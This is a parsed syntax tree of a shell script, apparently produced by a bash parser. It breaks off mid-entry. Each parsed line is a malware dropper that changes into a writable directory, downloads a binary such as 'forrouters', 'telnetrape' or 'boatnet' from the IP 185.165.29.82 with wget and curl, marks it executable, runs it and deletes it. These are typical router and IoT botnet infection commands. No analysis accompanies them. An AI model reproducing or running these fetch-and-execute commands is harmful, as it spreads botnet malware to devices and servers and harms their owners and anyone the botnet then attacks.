ListNode(lineno=2, pos=(12, 198), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 103), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 103), word='http://185.165.29.82/forrouters'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(103, 104)),
  CommandNode(lineno=2, pos=(105, 144), parts=[
    WordNode(lineno=2, pos=(105, 109), word='curl'),
    WordNode(lineno=2, pos=(110, 112), word='-O'),
    WordNode(lineno=2, pos=(113, 144), word='http://185.165.29.82/forrouters'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(144, 145)),
  CommandNode(lineno=2, pos=(146, 165), parts=[
    WordNode(lineno=2, pos=(146, 151), word='chmod'),
    WordNode(lineno=2, pos=(152, 154), word='+x'),
    WordNode(lineno=2, pos=(155, 165), word='forrouters'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(165, 166)),
  CommandNode(lineno=2, pos=(167, 179), parts=[
    WordNode(lineno=2, pos=(167, 179), word='./forrouters'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(179, 180)),
  CommandNode(lineno=2, pos=(181, 198), parts=[
    WordNode(lineno=2, pos=(181, 183), word='rm'),
    WordNode(lineno=2, pos=(184, 187), word='-rf'),
    WordNode(lineno=2, pos=(188, 198), word='forrouters'),
  ]),
])
ListNode(lineno=3, pos=(199, 355), parts=[
  CommandNode(lineno=3, pos=(199, 206), parts=[
    WordNode(lineno=3, pos=(199, 201), word='cd'),
    WordNode(lineno=3, pos=(202, 206), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(207, 209)),
  CommandNode(lineno=3, pos=(210, 221), parts=[
    WordNode(lineno=3, pos=(210, 212), word='cd'),
    WordNode(lineno=3, pos=(213, 221), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(222, 224)),
  CommandNode(lineno=3, pos=(225, 232), parts=[
    WordNode(lineno=3, pos=(225, 227), word='cd'),
    WordNode(lineno=3, pos=(228, 232), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(233, 235)),
  CommandNode(lineno=3, pos=(236, 244), parts=[
    WordNode(lineno=3, pos=(236, 238), word='cd'),
    WordNode(lineno=3, pos=(239, 244), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(245, 247)),
  CommandNode(lineno=3, pos=(248, 252), parts=[
    WordNode(lineno=3, pos=(248, 250), word='cd'),
    WordNode(lineno=3, pos=(251, 252), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(252, 253)),
  CommandNode(lineno=3, pos=(254, 284), parts=[
    WordNode(lineno=3, pos=(254, 258), word='wget'),
    WordNode(lineno=3, pos=(259, 284), word='http://185.165.29.82/Gooo'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(284, 285)),
  CommandNode(lineno=3, pos=(286, 319), parts=[
    WordNode(lineno=3, pos=(286, 290), word='curl'),
    WordNode(lineno=3, pos=(291, 293), word='-O'),
    WordNode(lineno=3, pos=(294, 319), word='http://185.165.29.82/Gooo'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(319, 320)),
  CommandNode(lineno=3, pos=(321, 334), parts=[
    WordNode(lineno=3, pos=(321, 326), word='chmod'),
    WordNode(lineno=3, pos=(327, 329), word='+x'),
    WordNode(lineno=3, pos=(330, 334), word='Gooo'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(334, 335)),
  CommandNode(lineno=3, pos=(336, 342), parts=[
    WordNode(lineno=3, pos=(336, 342), word='./Gooo'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(342, 343)),
  CommandNode(lineno=3, pos=(344, 355), parts=[
    WordNode(lineno=3, pos=(344, 346), word='rm'),
    WordNode(lineno=3, pos=(347, 350), word='-rf'),
    WordNode(lineno=3, pos=(351, 355), word='Gooo'),
  ]),
])
ListNode(lineno=4, pos=(356, 562), parts=[
  CommandNode(lineno=4, pos=(356, 363), parts=[
    WordNode(lineno=4, pos=(356, 358), word='cd'),
    WordNode(lineno=4, pos=(359, 363), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(364, 366)),
  CommandNode(lineno=4, pos=(367, 378), parts=[
    WordNode(lineno=4, pos=(367, 369), word='cd'),
    WordNode(lineno=4, pos=(370, 378), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(379, 381)),
  CommandNode(lineno=4, pos=(382, 389), parts=[
    WordNode(lineno=4, pos=(382, 384), word='cd'),
    WordNode(lineno=4, pos=(385, 389), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(390, 392)),
  CommandNode(lineno=4, pos=(393, 401), parts=[
    WordNode(lineno=4, pos=(393, 395), word='cd'),
    WordNode(lineno=4, pos=(396, 401), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(402, 404)),
  CommandNode(lineno=4, pos=(405, 409), parts=[
    WordNode(lineno=4, pos=(405, 407), word='cd'),
    WordNode(lineno=4, pos=(408, 409), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(409, 410)),
  CommandNode(lineno=4, pos=(411, 451), parts=[
    WordNode(lineno=4, pos=(411, 415), word='wget'),
    WordNode(lineno=4, pos=(416, 451), word='http://185.165.29.82/infectionation'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(451, 452)),
  CommandNode(lineno=4, pos=(453, 496), parts=[
    WordNode(lineno=4, pos=(453, 457), word='curl'),
    WordNode(lineno=4, pos=(458, 460), word='-O'),
    WordNode(lineno=4, pos=(461, 496), word='http://185.165.29.82/infectionation'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(496, 497)),
  CommandNode(lineno=4, pos=(498, 521), parts=[
    WordNode(lineno=4, pos=(498, 503), word='chmod'),
    WordNode(lineno=4, pos=(504, 506), word='+x'),
    WordNode(lineno=4, pos=(507, 521), word='infectionation'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(521, 522)),
  CommandNode(lineno=4, pos=(523, 539), parts=[
    WordNode(lineno=4, pos=(523, 539), word='./infectionation'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(539, 540)),
  CommandNode(lineno=4, pos=(541, 562), parts=[
    WordNode(lineno=4, pos=(541, 543), word='rm'),
    WordNode(lineno=4, pos=(544, 547), word='-rf'),
    WordNode(lineno=4, pos=(548, 562), word='infectionation'),
  ]),
])
ListNode(lineno=5, pos=(563, 749), parts=[
  CommandNode(lineno=5, pos=(563, 570), parts=[
    WordNode(lineno=5, pos=(563, 565), word='cd'),
    WordNode(lineno=5, pos=(566, 570), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(571, 573)),
  CommandNode(lineno=5, pos=(574, 585), parts=[
    WordNode(lineno=5, pos=(574, 576), word='cd'),
    WordNode(lineno=5, pos=(577, 585), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(586, 588)),
  CommandNode(lineno=5, pos=(589, 596), parts=[
    WordNode(lineno=5, pos=(589, 591), word='cd'),
    WordNode(lineno=5, pos=(592, 596), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(597, 599)),
  CommandNode(lineno=5, pos=(600, 608), parts=[
    WordNode(lineno=5, pos=(600, 602), word='cd'),
    WordNode(lineno=5, pos=(603, 608), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(609, 611)),
  CommandNode(lineno=5, pos=(612, 616), parts=[
    WordNode(lineno=5, pos=(612, 614), word='cd'),
    WordNode(lineno=5, pos=(615, 616), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(616, 617)),
  CommandNode(lineno=5, pos=(618, 654), parts=[
    WordNode(lineno=5, pos=(618, 622), word='wget'),
    WordNode(lineno=5, pos=(623, 654), word='http://185.165.29.82/telnetrape'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(654, 655)),
  CommandNode(lineno=5, pos=(656, 695), parts=[
    WordNode(lineno=5, pos=(656, 660), word='curl'),
    WordNode(lineno=5, pos=(661, 663), word='-O'),
    WordNode(lineno=5, pos=(664, 695), word='http://185.165.29.82/telnetrape'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(695, 696)),
  CommandNode(lineno=5, pos=(697, 716), parts=[
    WordNode(lineno=5, pos=(697, 702), word='chmod'),
    WordNode(lineno=5, pos=(703, 705), word='+x'),
    WordNode(lineno=5, pos=(706, 716), word='telnetrape'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(716, 717)),
  CommandNode(lineno=5, pos=(718, 730), parts=[
    WordNode(lineno=5, pos=(718, 730), word='./telnetrape'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(730, 731)),
  CommandNode(lineno=5, pos=(732, 749), parts=[
    WordNode(lineno=5, pos=(732, 734), word='rm'),
    WordNode(lineno=5, pos=(735, 738), word='-rf'),
    WordNode(lineno=5, pos=(739, 749), word='telnetrape'),
  ]),
])
ListNode(lineno=6, pos=(750, 941), parts=[
  CommandNode(lineno=6, pos=(750, 757), parts=[
    WordNode(lineno=6, pos=(750, 752), word='cd'),
    WordNode(lineno=6, pos=(753, 757), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(758, 760)),
  CommandNode(lineno=6, pos=(761, 772), parts=[
    WordNode(lineno=6, pos=(761, 763), word='cd'),
    WordNode(lineno=6, pos=(764, 772), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(773, 775)),
  CommandNode(lineno=6, pos=(776, 783), parts=[
    WordNode(lineno=6, pos=(776, 778), word='cd'),
    WordNode(lineno=6, pos=(779, 783), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(784, 786)),
  CommandNode(lineno=6, pos=(787, 795), parts=[
    WordNode(lineno=6, pos=(787, 789), word='cd'),
    WordNode(lineno=6, pos=(790, 795), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(796, 798)),
  CommandNode(lineno=6, pos=(799, 803), parts=[
    WordNode(lineno=6, pos=(799, 801), word='cd'),
    WordNode(lineno=6, pos=(802, 803), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(803, 804)),
  CommandNode(lineno=6, pos=(805, 842), parts=[
    WordNode(lineno=6, pos=(805, 809), word='wget'),
    WordNode(lineno=6, pos=(810, 842), word='http://185.165.29.82/serversrape'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(842, 843)),
  CommandNode(lineno=6, pos=(844, 884), parts=[
    WordNode(lineno=6, pos=(844, 848), word='curl'),
    WordNode(lineno=6, pos=(849, 851), word='-O'),
    WordNode(lineno=6, pos=(852, 884), word='http://185.165.29.82/serversrape'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(884, 885)),
  CommandNode(lineno=6, pos=(886, 906), parts=[
    WordNode(lineno=6, pos=(886, 891), word='chmod'),
    WordNode(lineno=6, pos=(892, 894), word='+x'),
    WordNode(lineno=6, pos=(895, 906), word='serversrape'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(906, 907)),
  CommandNode(lineno=6, pos=(908, 921), parts=[
    WordNode(lineno=6, pos=(908, 921), word='./serversrape'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(921, 922)),
  CommandNode(lineno=6, pos=(923, 941), parts=[
    WordNode(lineno=6, pos=(923, 925), word='rm'),
    WordNode(lineno=6, pos=(926, 929), word='-rf'),
    WordNode(lineno=6, pos=(930, 941), word='serversrape'),
  ]),
])
ListNode(lineno=7, pos=(942, 1098), parts=[
  CommandNode(lineno=7, pos=(942, 949), parts=[
    WordNode(lineno=7, pos=(942, 944), word='cd'),
    WordNode(lineno=7, pos=(945, 949), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(950, 952)),
  CommandNode(lineno=7, pos=(953, 964), parts=[
    WordNode(lineno=7, pos=(953, 955), word='cd'),
    WordNode(lineno=7, pos=(956, 964), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(965, 967)),
  CommandNode(lineno=7, pos=(968, 975), parts=[
    WordNode(lineno=7, pos=(968, 970), word='cd'),
    WordNode(lineno=7, pos=(971, 975), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(976, 978)),
  CommandNode(lineno=7, pos=(979, 987), parts=[
    WordNode(lineno=7, pos=(979, 981), word='cd'),
    WordNode(lineno=7, pos=(982, 987), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(988, 990)),
  CommandNode(lineno=7, pos=(991, 995), parts=[
    WordNode(lineno=7, pos=(991, 993), word='cd'),
    WordNode(lineno=7, pos=(994, 995), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(995, 996)),
  CommandNode(lineno=7, pos=(997, 1027), parts=[
    WordNode(lineno=7, pos=(997, 1001), word='wget'),
    WordNode(lineno=7, pos=(1002, 1027), word='http://185.165.29.82/cdot'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1027, 1028)),
  CommandNode(lineno=7, pos=(1029, 1062), parts=[
    WordNode(lineno=7, pos=(1029, 1033), word='curl'),
    WordNode(lineno=7, pos=(1034, 1036), word='-O'),
    WordNode(lineno=7, pos=(1037, 1062), word='http://185.165.29.82/cdot'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1062, 1063)),
  CommandNode(lineno=7, pos=(1064, 1077), parts=[
    WordNode(lineno=7, pos=(1064, 1069), word='chmod'),
    WordNode(lineno=7, pos=(1070, 1072), word='+x'),
    WordNode(lineno=7, pos=(1073, 1077), word='cdot'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1077, 1078)),
  CommandNode(lineno=7, pos=(1079, 1085), parts=[
    WordNode(lineno=7, pos=(1079, 1085), word='./cdot'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(1085, 1086)),
  CommandNode(lineno=7, pos=(1087, 1098), parts=[
    WordNode(lineno=7, pos=(1087, 1089), word='rm'),
    WordNode(lineno=7, pos=(1090, 1093), word='-rf'),
    WordNode(lineno=7, pos=(1094, 1098), word='cdot'),
  ]),
])
ListNode(lineno=8, pos=(1099, 1265), parts=[
  CommandNode(lineno=8, pos=(1099, 1106), parts=[
    WordNode(lineno=8, pos=(1099, 1101), word='cd'),
    WordNode(lineno=8, pos=(1102, 1106), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1107, 1109)),
  CommandNode(lineno=8, pos=(1110, 1121), parts=[
    WordNode(lineno=8, pos=(1110, 1112), word='cd'),
    WordNode(lineno=8, pos=(1113, 1121), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1122, 1124)),
  CommandNode(lineno=8, pos=(1125, 1132), parts=[
    WordNode(lineno=8, pos=(1125, 1127), word='cd'),
    WordNode(lineno=8, pos=(1128, 1132), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1133, 1135)),
  CommandNode(lineno=8, pos=(1136, 1144), parts=[
    WordNode(lineno=8, pos=(1136, 1138), word='cd'),
    WordNode(lineno=8, pos=(1139, 1144), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1145, 1147)),
  CommandNode(lineno=8, pos=(1148, 1152), parts=[
    WordNode(lineno=8, pos=(1148, 1150), word='cd'),
    WordNode(lineno=8, pos=(1151, 1152), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1152, 1153)),
  CommandNode(lineno=8, pos=(1154, 1186), parts=[
    WordNode(lineno=8, pos=(1154, 1158), word='wget'),
    WordNode(lineno=8, pos=(1159, 1186), word='http://185.165.29.82/honcho'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1186, 1187)),
  CommandNode(lineno=8, pos=(1188, 1223), parts=[
    WordNode(lineno=8, pos=(1188, 1192), word='curl'),
    WordNode(lineno=8, pos=(1193, 1195), word='-O'),
    WordNode(lineno=8, pos=(1196, 1223), word='http://185.165.29.82/honcho'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1223, 1224)),
  CommandNode(lineno=8, pos=(1225, 1240), parts=[
    WordNode(lineno=8, pos=(1225, 1230), word='chmod'),
    WordNode(lineno=8, pos=(1231, 1233), word='+x'),
    WordNode(lineno=8, pos=(1234, 1240), word='honcho'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1240, 1241)),
  CommandNode(lineno=8, pos=(1242, 1250), parts=[
    WordNode(lineno=8, pos=(1242, 1250), word='./honcho'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1250, 1251)),
  CommandNode(lineno=8, pos=(1252, 1265), parts=[
    WordNode(lineno=8, pos=(1252, 1254), word='rm'),
    WordNode(lineno=8, pos=(1255, 1258), word='-rf'),
    WordNode(lineno=8, pos=(1259, 1265), word='honcho'),
  ]),
])
ListNode(lineno=9, pos=(1266, 1412), parts=[
  CommandNode(lineno=9, pos=(1266, 1273), parts=[
    WordNode(lineno=9, pos=(1266, 1268), word='cd'),
    WordNode(lineno=9, pos=(1269, 1273), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1274, 1276)),
  CommandNode(lineno=9, pos=(1277, 1288), parts=[
    WordNode(lineno=9, pos=(1277, 1279), word='cd'),
    WordNode(lineno=9, pos=(1280, 1288), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1289, 1291)),
  CommandNode(lineno=9, pos=(1292, 1299), parts=[
    WordNode(lineno=9, pos=(1292, 1294), word='cd'),
    WordNode(lineno=9, pos=(1295, 1299), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1300, 1302)),
  CommandNode(lineno=9, pos=(1303, 1311), parts=[
    WordNode(lineno=9, pos=(1303, 1305), word='cd'),
    WordNode(lineno=9, pos=(1306, 1311), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1312, 1314)),
  CommandNode(lineno=9, pos=(1315, 1319), parts=[
    WordNode(lineno=9, pos=(1315, 1317), word='cd'),
    WordNode(lineno=9, pos=(1318, 1319), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1319, 1320)),
  CommandNode(lineno=9, pos=(1321, 1349), parts=[
    WordNode(lineno=9, pos=(1321, 1325), word='wget'),
    WordNode(lineno=9, pos=(1326, 1349), word='http://185.165.29.82/H3'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1349, 1350)),
  CommandNode(lineno=9, pos=(1351, 1382), parts=[
    WordNode(lineno=9, pos=(1351, 1355), word='curl'),
    WordNode(lineno=9, pos=(1356, 1358), word='-O'),
    WordNode(lineno=9, pos=(1359, 1382), word='http://185.165.29.82/H3'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1382, 1383)),
  CommandNode(lineno=9, pos=(1384, 1395), parts=[
    WordNode(lineno=9, pos=(1384, 1389), word='chmod'),
    WordNode(lineno=9, pos=(1390, 1392), word='+x'),
    WordNode(lineno=9, pos=(1393, 1395), word='H3'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1395, 1396)),
  CommandNode(lineno=9, pos=(1397, 1401), parts=[
    WordNode(lineno=9, pos=(1397, 1401), word='./H3'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1401, 1402)),
  CommandNode(lineno=9, pos=(1403, 1412), parts=[
    WordNode(lineno=9, pos=(1403, 1405), word='rm'),
    WordNode(lineno=9, pos=(1406, 1409), word='-rf'),
    WordNode(lineno=9, pos=(1410, 1412), word='H3'),
  ]),
])
ListNode(lineno=10, pos=(1413, 1584), parts=[
  CommandNode(lineno=10, pos=(1413, 1420), parts=[
    WordNode(lineno=10, pos=(1413, 1415), word='cd'),
    WordNode(lineno=10, pos=(1416, 1420), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1421, 1423)),
  CommandNode(lineno=10, pos=(1424, 1435), parts=[
    WordNode(lineno=10, pos=(1424, 1426), word='cd'),
    WordNode(lineno=10, pos=(1427, 1435), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1436, 1438)),
  CommandNode(lineno=10, pos=(1439, 1446), parts=[
    WordNode(lineno=10, pos=(1439, 1441), word='cd'),
    WordNode(lineno=10, pos=(1442, 1446), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1447, 1449)),
  CommandNode(lineno=10, pos=(1450, 1458), parts=[
    WordNode(lineno=10, pos=(1450, 1452), word='cd'),
    WordNode(lineno=10, pos=(1453, 1458), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1459, 1461)),
  CommandNode(lineno=10, pos=(1462, 1466), parts=[
    WordNode(lineno=10, pos=(1462, 1464), word='cd'),
    WordNode(lineno=10, pos=(1465, 1466), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1466, 1467)),
  CommandNode(lineno=10, pos=(1468, 1501), parts=[
    WordNode(lineno=10, pos=(1468, 1472), word='wget'),
    WordNode(lineno=10, pos=(1473, 1501), word='http://185.165.29.82/proxies'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1501, 1502)),
  CommandNode(lineno=10, pos=(1503, 1539), parts=[
    WordNode(lineno=10, pos=(1503, 1507), word='curl'),
    WordNode(lineno=10, pos=(1508, 1510), word='-O'),
    WordNode(lineno=10, pos=(1511, 1539), word='http://185.165.29.82/proxies'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1539, 1540)),
  CommandNode(lineno=10, pos=(1541, 1557), parts=[
    WordNode(lineno=10, pos=(1541, 1546), word='chmod'),
    WordNode(lineno=10, pos=(1547, 1549), word='+x'),
    WordNode(lineno=10, pos=(1550, 1557), word='proxies'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1557, 1558)),
  CommandNode(lineno=10, pos=(1559, 1568), parts=[
    WordNode(lineno=10, pos=(1559, 1568), word='./proxies'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1568, 1569)),
  CommandNode(lineno=10, pos=(1570, 1584), parts=[
    WordNode(lineno=10, pos=(1570, 1572), word='rm'),
    WordNode(lineno=10, pos=(1573, 1576), word='-rf'),
    WordNode(lineno=10, pos=(1577, 1584), word='proxies'),
  ]),
])
ListNode(lineno=11, pos=(1585, 1756), parts=[
  CommandNode(lineno=11, pos=(1585, 1592), parts=[
    WordNode(lineno=11, pos=(1585, 1587), word='cd'),
    WordNode(lineno=11, pos=(1588, 1592), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1593, 1595)),
  CommandNode(lineno=11, pos=(1596, 1607), parts=[
    WordNode(lineno=11, pos=(1596, 1598), word='cd'),
    WordNode(lineno=11, pos=(1599, 1607), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1608, 1610)),
  CommandNode(lineno=11, pos=(1611, 1618), parts=[
    WordNode(lineno=11, pos=(1611, 1613), word='cd'),
    WordNode(lineno=11, pos=(1614, 1618), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1619, 1621)),
  CommandNode(lineno=11, pos=(1622, 1630), parts=[
    WordNode(lineno=11, pos=(1622, 1624), word='cd'),
    WordNode(lineno=11, pos=(1625, 1630), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1631, 1633)),
  CommandNode(lineno=11, pos=(1634, 1638), parts=[
    WordNode(lineno=11, pos=(1634, 1636), word='cd'),
    WordNode(lineno=11, pos=(1637, 1638), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1638, 1639)),
  CommandNode(lineno=11, pos=(1640, 1673), parts=[
    WordNode(lineno=11, pos=(1640, 1644), word='wget'),
    WordNode(lineno=11, pos=(1645, 1673), word='http://185.165.29.82/boatnet'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1673, 1674)),
  CommandNode(lineno=11, pos=(1675, 1711), parts=[
    WordNode(lineno=11, pos=(1675, 1679), word='curl'),
    WordNode(lineno=11, pos=(1680, 1682), word='-O'),
    WordNode(lineno=11, pos=(1683, 1711), word='http://185.165.29.82/boatnet'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1711, 1712)),
  CommandNode(lineno=11, pos=(1713, 1729), parts=[
    WordNode(lineno=11, pos=(1713, 1718), word='chmod'),
    WordNode(lineno=11, pos=(1719, 1721), word='+x'),
    WordNode(lineno=11, pos=(1722, 1729), word='boatnet'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1729, 1730)),
  CommandNode(lineno=11, pos=(1731, 1740), parts=[
    WordNode(lineno=11, pos=(1731, 1740), word='./boatnet'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1740, 1741)),
  CommandNode(lineno=11, pos=(1742, 1756), parts=[
    WordNode(lineno=11, pos=(1742, 1744), word='rm'),
    WordNode(lineno=11, pos=(1745, 1748), word='-rf'),
    WordNode(lineno=11, pos=(1749, 1756), word='boatnet'),
  ]),
])
ListNode(lineno=12, pos=(1757, 1908), parts=[
  CommandNode(lineno=12, pos=(1757, 1764), parts=[
    WordNode(lineno=12, pos=(1757, 1759), word='cd'),
    WordNode(lineno=12, pos=(1760, 1764), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1765, 1767)),
  CommandNode(lineno=12, pos=(1768, 1779), parts=[
    WordNode(lineno=12, pos=(1768, 1770), word='cd'),
    WordNode(lineno=12, pos=(1771, 1779), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1780, 1782)),
  CommandNode(lineno=12, pos=(1783, 1790), parts=[
    WordNode(lineno=12, pos=(1783, 1785), word='cd'),
    WordNode(lineno=12, pos=(1786, 1790), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1791, 1793)),
  CommandNode(lineno=12, pos=(1794, 1802), parts=[
    WordNode(lineno=12, pos=(1794, 1796), word='cd'),
    WordNode(lineno=12, pos=(1797, 1802), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1803, 1805)),
  CommandNode(lineno=12, pos=(1806, 1810), parts=[
    WordNode(lineno=12, pos=(1806, 1808), word='cd'),
    WordNode(lineno=12, pos=(1809, 1810), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1810, 1811)),
  CommandNode(lineno=12, pos=(1812, 1841), parts=[
    WordNode(lineno=12, pos=(1812, 1816), word='wget'),
    WordNode(lineno=12, pos=(1817, 1841), word='http://185.165.29.82/nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1841, 1842)),
  CommandNode(lineno=12, pos=(1843, 1875), parts=[
    WordNode(lineno=12, pos=(1843, 1847), word='curl'),
    WordNode(lineno=12, pos=(1848, 1850), word='-O'),
    WordNode(lineno=12, pos=(1851, 1875), word='http://185.165.29.82/nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1875, 1876)),
  CommandNode(lineno=12, pos=(1877, 1889), parts=[
    WordNode(lineno=12, pos=(1877, 1882), word='chmod'),
    WordNode(lineno=12, pos=(1883, 1885), word='+x'),
    WordNode(lineno=12, pos=(1886, 1889), word='nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1889, 1890)),
  CommandNode(lineno=12, pos=(1891, 1896), parts=[
    WordNode(lineno=12, pos=(1891, 1896), word='./nut'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1896, 1897)),
  CommandNode(lineno=12, pos=(1898, 1908), parts=[
    WordNode(lineno=12, pos=(1898, 1900), word='rm'),
    WordNode(lineno=12, pos=(1901, 1904), word='-rf'),
    WordNode(lineno=12, pos=(1905, 1908), word='nut'),
  ]),
])
ListNode(lineno=13, pos=(1909, 2080), parts=[
  CommandNode(lineno=13, pos=(1909, 1916), parts=[
    WordNode(lineno=13, pos=(1909, 1911), word='cd'),
    WordNode(lineno=13, pos=(1912, 1916), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1917, 1919)),
  CommandNode(lineno=13, pos=(1920, 1931), parts=[
    WordNode(lineno=13, pos=(1920, 1922), word='cd'),
    WordNode(lineno=13, pos=(1923, 1931), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1932, 1934)),
  CommandNode(lineno=13, pos=(1935, 1942), parts=[
    WordNode(lineno=13, pos=(1935, 1937), word='cd'),
    WordNode(lineno=13, pos=(1938, 1942), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1943, 1945)),
  CommandNode(lineno=13, pos=(1946, 1954), parts=[
    WordNode(lineno=13, pos=(1946, 1948), word='cd'),
    WordNode(lineno=13, pos=(1949, 1954), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1955, 1957)),
  CommandNode(lineno=13, pos=(1958, 1962), parts=[
    WordNode(lineno=13, pos=(1958, 1960), word='cd'),
    WordNode(lineno=13, pos=(1961, 1962), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1962, 1963)),
  CommandNode(lineno=13, pos=(1964, 1997), parts=[
